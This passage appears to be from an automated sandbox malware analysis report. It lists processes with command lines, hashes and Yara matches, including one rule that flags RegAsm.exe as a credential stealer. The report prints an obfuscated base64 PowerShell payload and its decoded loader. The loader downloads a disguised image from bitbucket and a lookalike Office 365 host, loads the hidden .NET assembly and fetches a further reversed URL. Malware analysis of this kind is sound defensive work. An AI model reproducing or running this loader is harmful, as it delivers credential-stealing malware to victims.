k@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@UwB1@GI@cwB0@HI@aQBu@Gc@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@L@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@d@Bl@Hg@d@@g@D0@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@7@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FI@ZQBm@Gw@ZQBj@HQ@aQBv@G4@LgBB@HM@cwBl@G0@YgBs@Hk@XQ@6@Do@T@Bv@GE@Z@@o@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@KQ@7@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@bQBl@HQ@a@Bv@GQ@I@@9@C@@J@B0@Hk@c@Bl@C4@RwBl@HQ@TQBl@HQ@a@Bv@GQ@K@@n@Gw@ZgBz@Gc@ZQBk@GQ@Z@Bk@GQ@Z@Bk@GE@Jw@p@C4@SQBu@HY@bwBr@GU@K@@k@G4@dQBs@Gw@L@@g@Fs@bwBi@Go@ZQBj@HQ@WwBd@F0@I@@o@Cc@d@B4@HQ@LgBk@GY@ZwBk@G0@QQBJ@C8@bgBp@GE@bQ@v@HM@Z@Bh@GU@a@@v@HM@ZgBl@HI@LwBr@DY@Mw@v@DM@MQ@y@GU@aQBo@GM@aQBy@C8@bQBv@GM@LgB0@G4@ZQB0@G4@bwBj@HI@ZQBz@HU@YgB1@Gg@d@Bp@Gc@LgB3@GE@cg@v@C8@OgBz@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@FI@ZQBn@EE@cwBt@Cc@L@@g@Cc@M@@n@Ck@KQB9@H0@';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                                                                            Imagebase:0x7ff760310000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:3
                                                                                                            Start time:05:23:01
                                                                                                            Start date:06/02/2025
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff70f010000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:4
                                                                                                            Start time:05:23:03
                                                                                                            Start date:06/02/2025
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.dfgdmAI/niam/sdaeh/sfer/k63/312eihcir/moc.tnetnocresubuhtig.war//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
                                                                                                            Imagebase:0x7ff760310000
                                                                                                            File size:452'608 bytes
                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:6
                                                                                                            Start time:05:23:17
                                                                                                            Start date:06/02/2025
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                            Imagebase:0xf10000
                                                                                                            File size:65'440 bytes
                                                                                                            MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.1642022551.00000000059F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.1619760521.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1619760521.0000000003518000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1619760521.0000000003384000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Disassembly

                                                                                                            Reset < >